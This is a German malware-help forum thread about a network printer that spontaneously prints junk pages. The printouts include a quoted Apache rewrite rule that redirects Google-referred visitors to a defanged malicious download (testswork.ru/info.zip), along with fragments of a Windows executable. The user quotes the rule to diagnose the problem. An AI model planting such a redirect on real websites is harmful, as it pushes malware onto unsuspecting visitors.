|
Drucker druckt ohne Anweisung bis er leer ist - XPS Print error - testswork.ru Hallo, ich verwende in einem Netzwerk einen Kyocera Ecosys M2535dn, das ist ein Kombigerät zum drucken, faxen, scannen. Dieser ist angeschlossen an eine Fritzbox 7490 (über die auch der Internetzugang läuft). Außerdem sind in dem Netzwerk 3 PCs. Es kommt seit geraumer Zeit etwa 1x die Woche vor, dass der Drucker über Nacht, wenn alle PCs ausgeschaltet sind, eine Seite mit "XPS Print Error Job Name: (None) Document Name: (None) Page number: 0 Error: XPS Format error (19,4,2)" bedruckt. Darauf folgt eine Seite mit "Rewrite Engine on RewriteCond %{HTTP_REFERER} ^(.*)Google\.(.*) RewriteRule .* hxxp://testswork.ru/info.zip [L]" 3. Seite: Viele nicht entzifferbare Zeichen, darin enthalten "This program cannot be run in DOS mode." Hierauf folgen massig Seiten, die am oberen Rand nur noch mit irgendwelche Zeichen bedruckt werden. Gedruckt wird solange, bis das Papierfach leer ist. Meine Suche nach einer Lösung war bislang komplett erfolglos. Hat hier jemand eine Idee? Vielen Dank im Voraus rorob |
:hallo: Wieso denkst du, dass dein Problem etwas mit Malware zu tun hat? :) |
Hallo MKDB, danke für die Rückmeldung. Meine Vermutung hat mehrere Ursachen: Dieses "testswork.ru/info.zip" hört sich meines Erachtens schon verdächtig an. Es scheint ja, als wolle der Drucker irgendetwas drucken, was er nicht drucken/verarbeiten kann. Also muss irgendwoher der Befehl zum Drucken einer Datei kommen. Diese Datei könnte diese info.zip sein - und ich habe keine Ahnung, was das sein sollte, zumal ich nicht wissentlich etwas mit .ru - Seiten zu tun habe. Hinzu kommt, dass ich natürlich google bemüht habe. Die Ergebnisse waren sehr dürftig, einer hat in verschiedenen Foren eine fast identische Situation geschildert. Die Aussagen gingen aber alle in dieselbe Richtung, nämlich dass es Malware sein muss. Hinzu kommen die Ergebnisse z.B. der Virustotal domain info: https://www.virustotal.com/en/domain/testswork.ru/information/ Zitat:
Zitat:
hxxp://home.mcafee.com/virusinfo/virusprofile.aspx?key=99728 Diese ganzen Indizien ließen mich dann vermuten, dass es sich um Malware handelt und ich somit hier richtig bin ;) Danke schonmal, rorob |
Servus, na dann schauen wir mal... :) Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen. Bitte beachte folgende Hinweise:
Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:  So funktioniert es:Posten in CODE-Tags Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
Danke für deine Mitarbeit! Zur ersten Analyse bitte FRST und TDSS-Killer ausführen: Schritt 1 Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:  FRST 32-Bit | FRST 64-Bit(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
Schritt 2 Downloade dir bitte  TDSSKiller.exe und speichere diese Datei auf dem Desktop
Bitte poste mit deiner nächsten Antwort
|
Hallo Matthias, vielen Dank für die Rückmeldung und die Anweisungen. Leider komme ich vor Montag nicht mehr zu den betreffenden Rechnern. Es handelt sich hierbei auch um betriebliche Rechner mit im Hinblick auf Datenschutz sehr sensiblen Daten - stellt das ein Problem dar bzw. besteht die Möglichkeit, dass die von Dir genannten Programme in ihren Logfiles irgendetwas dahingehend aufzeichnen? Jedenfalls muss ich, bevor ich mit den Scans beginne, ersteinmal Rücksprache mit Kollegen halten. Das wusste ich zwar auch bevor ich die Frage hier gestellt habe, allerdings hatte ich gehofft, dass das beschriebene Problem vllt. bekannt ist, sodass auch Auskünfte ohne die Scans möglich sind. Ich danke Dir jedenfalls erneut für Deine Hilfe und komme so schnell wie möglich, voraussichtlich spätestens Montag, hierauf zurück. Grüße rorob |
Servus, so etwas musst du im ersten Post erwähnen: Zitat:
|
Hi, sorry, das hatte ich nicht zuvor gelesen. Es handelt sich tatsächlich um einen eher kleineren Betrieb ohne eigene IT Abteilung. Ich werde die Sache mal hier ansprechen - natürlich auch die Sache mit der Spende - und mich dann erneut melden. Da die Daten tatsächlich aber besonderen Verschwiegenheitsverpflichtungen unterliegen, befürchte ich jedoch, dass das Arbeiten mit den Logfiles etc. nicht möglich sein wird. Dennoch natürlich vielen Dank an Dich und das Board. rorob |
Servus, kann ich verstehen. Gib mir einfach nächste Woche Bescheid. :) |
Servus, gibts schon Neuigkeiten? |
Fehlende Rückmeldung Dieses Thema wurde aus den Abos gelöscht. Somit bekomme ich keine Benachrichtigung über neue Antworten. PM an mich falls Du denoch weiter machen willst. Hinweis: Das Verschwinden der Symptome bedeutet nicht, dass Dein Rechner schon sauber ist. Jeder andere bitte hier klicken und einen eigenen Thread erstellen! |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 03:33 Uhr. |
Copyright ©2000-2025, Trojaner-Board